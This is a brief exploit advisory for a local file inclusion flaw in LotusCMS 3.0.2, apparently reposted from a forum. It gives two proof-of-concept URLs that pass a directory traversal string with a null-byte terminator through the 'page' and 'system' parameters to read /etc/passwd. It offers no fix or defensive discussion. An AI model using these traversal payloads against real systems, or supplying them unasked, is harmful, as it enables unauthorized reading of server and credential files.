Kod:# exploit title: local file include in LotusCMS 3.0.2 # date: 15.o3.2o11 # author: lemlajt # software : LotusCMS # version: 3.0.2 # tested on: linux # cve : # PoC : http://localhost/lotuscms/index.php?page=../../../../../../../../../../../../../etc/passwd%00 http://localhost/lotuscms/index.php?system=../../../../../../../../../../../../../etc/passwd%00 # regards, # lemlajt # *